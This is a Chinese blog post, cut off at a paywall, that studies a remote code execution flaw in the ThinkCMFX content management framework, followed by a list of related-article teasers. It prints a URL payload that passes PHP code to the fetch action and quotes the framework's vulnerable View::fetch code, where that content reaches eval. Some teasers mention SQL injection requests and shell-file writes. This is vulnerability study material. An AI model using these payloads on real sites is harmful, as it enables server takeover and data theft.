thinkcmfx漏洞太大_ThinkCMFX任意文件包含漏洞(学习)

最新推荐文章于 2023-09-22 16:43:22 发布
最新推荐文章于 2023-09-22 16:43:22 发布
阅读量293 收藏
点赞数
文章标签: thinkcmfx漏洞太大
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39967120/article/details/111814529
版权

前言:最近爆出来的漏洞,ThinkCmfX版本应该是通杀的,基于3.X Thinkphp开发的

我们就拿这个payload来进行分析

http://127.0.0.1/index.php?a=fetch&content=<?php system(‘ping xxxxxx’);?>

我们要知道tp框架的特性,可以通过这种形式的路由方式进行访问相应的功能点,例如通过g\m\a参数指定分组\控制器\方法

我们可以跟进父类的fetch的方法中查看

发现还调用了父类的fetch方法return parent::fetch($templateFile,$content,$prefix);,那我们可以继续来到AppframeController,但是发现里面没有fetch那么就肯定是继承来自Controller的控制器了,继续跟进

发现调用了view类的fetch方法继续更,这里的view类是Controller构造函数中$this->view = Think::instance('Think\View');

view类中的fetch方法如下:

public function fetch($templateFile='',$content='',$prefix='') {

if(empty($content)) { //首先判断content有无内容

$templateFile = $this->parseTemplate($templateFile);

// 模板文件不存在直接返回

if(!is_file($templateFile)) E(L('_TEMPLATE_NOT_EXIST_').':'.$templateFile);

}else{

defined('THEME_PATH') or define('THEME_PATH', $this->getThemePath());

}

// 页面缓存

ob_start();

ob_implicit_flush(0);

if('php' == strtolower(C('TMPL_ENGINE_TYPE'))) { // 使用PHP原生模板

$_content = $content;

// 模板阵列变量分解成为独立变量

extract($this->tVar, EXTR_OVERWRITE);

// 直接载入PHP模板

empty($_content)?include $templateFile:eval('?>'.$_content);

}else{

// 视图解析标签

// 走的是这里

$params = array('var'=>$this->tVar,'file'=>$templateFile,'content'=>$content,'prefix'=>$prefix);

最低0.47元/天 解锁文章
weixin_39967120
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ThinkCMFX文件包含漏洞
冠霖L的博客
11-03 1957
0x00 漏洞简介 ThinkCMF是一款基于ThinkPHP+MySQL开发的中文内容管理框架,攻击者可利用此漏洞构造恶意的url,向服务器写入任意内容的文件,从而能够达到远程代码执行 0x01 影响范围 1.6.0 < ThinkCMFX < 2.3.0 0x02 环境搭建 使用ThinkCMFX2.2.0版本搭建,利用中间件phpstudy运行搭建的网站,网站一键安装即可 ...
ThinkCMFX.zip_ThinkCMFX
09-20
款基于ThinkPHP+MYSQL开发的中文内容管理框架。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。在这种运行机制下,开发商场应用的用户无需关心开发SNS应用时如何工作的,但他们之间又可通过系统本身进行协调,大大的降低了开发成本和沟通成本。
【组件攻击链】ThinkCMF 高危漏洞分析与利用
further_eye的博客
11-18 1215
ThinkCMF X2.x系列最大的风险存在于ThinkCMF框架中Controller中的两个模板操作函数。ThinkCMF 5系列近两年比较出名的就是CVE-2019-6713、CVE-2019-7580两个后台任意代码执行漏洞
thinkcmfx漏洞太大_Thinkcmf任意漏洞包含漏洞分析复现
weixin_39584529的博客
12-30 151
简介ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架,底层采用ThinkPHP3.2.3构建。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。在这种运行机制下,开发商场应用的用户无需关心开发SNS应用时如何工作的,但他们之间又可通过系统本身进行协...
ThinkCMFX漏洞合集
https://www.cnblogs.com/zpchcbd/
08-13 5599
前台的SQL注入(需要前台会员权限) : POST /ThinkCMFX/index.php?g=portal&m=article&a=edit_post HTTP/1.1 Host: localhost Connection: close Cookie: PHPSESSID=kcg5v82ms3v13o8pgrhh9saj95 Content-Type: application/...
thinkcmfx漏洞太大_thinkcmf漏洞集合
weixin_39765695的博客
12-22 576
thinkcmf漏洞集合在先知逛的时候看到的的,后面发现是thinkcmf 翻了一下自己的漏洞库对比了一下版本发现,泡泡大佬这里看的是1.6版本的,而官方最后的版本 2.2.3 所以做一下漏洞补充。注:thinkcmf 并没有死,他拥有两个版本一个是 thinkcmf5 一个是 thnkcmf2.2.3 但是这两个版本都有漏洞,因为现在thinkcmf2.2.3使用的人越来越少了,所以爆出来,至于...
ThinkCMF&tp3.2漏洞
热门推荐
风的专栏
01-16 1万+
hinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架,底层采用ThinkPHP3.2.3构建。 ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。 每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。在这种运行机制下,开发商场应用的用户无需关心开发SNS应用时如何工作的,但他们之间又可通过系统本身进行协调...
ThinkCMF 2.2.0漏洞
2301_79773660的博客
09-22 270
?>’)/shell.php?>’)
thinkcmfx漏洞太大_ThinkCMFX2.2.3漏洞复现
weixin_39646405的博客
12-22 762
对ThinkCMFX最终版本2.2.3存在的四个漏洞进行复现ThinkCMFX 是基于 ThinkPHP3 开发的 ,ThinkCMFX2.2.3 下载地址:https://pan.baidu.com/s/1bRXwdg前台SQL注入随意注册一个 普通用户 登陆后,发送如下数据包可触发 SQL注入12345678POST /index.php?g=portal&m=article&...
ThinkCMFX内容管理框架-PHP
06-20
支持多文件上传</p><p>ThinkCMF 更新日志:</p><p>v5.1.7</p><p>重构回收站代码,添加全部删除、一键清空和全部还原功能</p><p>增加插件url美化</p><p>增加默认过滤器</p><p>增加插件未安装、未启用时禁止访问</p><p...
ThinkCMFX内容管理框架 v5.1.4
11-05
ThinkCMF是一款基于ThinkPHP+MYSQL开发的中文内容管理框架。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。每个应用都能
ThinkCMFX 中文内容管理框架 v5.0.170927
11-28
ThinkCMF是一款基于ThinkPHP+MYSQL开发的中文内容管理框架。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。每个应用都能
thinkcmf 渗透测试漏洞修复解决方案
网站安全资讯
11-20 962
近段时间发现很多APP程序用的是thinkcmf,此程序源码存在getshell漏洞,我们Sine安全紧急对此高危漏洞进行了分析和漏洞修复,攻击者可以通过构造特定的请求包get请求即可在远程服务器上执行任意脚本代码。 根据index.php中的配置,项目路径为application,打开 P...
2024年印度标定气体混合物市场机会及渠道调研报告-样本.docx
06-04
2024年印度标定气体混合物市场机会及渠道调研报告-样本
基于C8051F005单片机的两相混合式直线步进电机驱动系统的设计
最新发布
06-04
本课题采用比普通单片机快十多倍的C8051F005单片机,设计了基于C8051F005 控制的直线步进电机驱动控制系统,扩大了细分度和速度的可调节范围。 在控制策略上,依据直线步进电机力-速特性和动力学方程,推导了直线步进电动机理想的升降速控制曲线,实现了指数规律的升降速控制,使系统具有良好的动态特性,解决了点位控制中的失步和直线步进电机行程末端的机械冲击问题;采用等幅均匀细分控制技术,有效地克服直线步进电机低频振动,提高了电机在中、低速运行时的性能,提高了系统的分辨率,减小了噪音;采用具有恒流斩波功能的专用驱动芯片,使直线步进电机绕组电流恒定,电机运行更加平稳。 完成了C8051F005单片机和UC3717A结合的硬件电路设计,用汇编语言编写直线步进电机定位、匀速往返和加减速三种运行方式控制程序。实现了对直线步进电机的启停、定位、调速及正反向运行的控制。最后在SLPMU-025A样机上进行了测试,实验结果满足设计要求。
SMG6402-VB一款P-Channel沟道SOT23的MOSFET晶体管参数介绍与应用说明
06-04
SOT23;P—Channel沟道,-20V;-4A;RDS(ON)=57mΩ@VGS=4.5V,VGS=12V;Vth=-0.81V;
jpg11111111111111
06-04
jpg11111111111111
2262.冰湖杨氏宗谱: 三卷:[义乌].pdf
06-04
2262.冰湖杨氏宗谱: 三卷:[义乌]
module-0982.SyncTensorsGraph.9515.sm-8.0-gpu-after-optimizations
06-04
D:\Workspace\XLA-GPU CodeGen\streaming_llm\gen2\opt\module_0982.SyncTensorsGraph.9515.sm_8.0_gpu_after_optimizations.txt

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值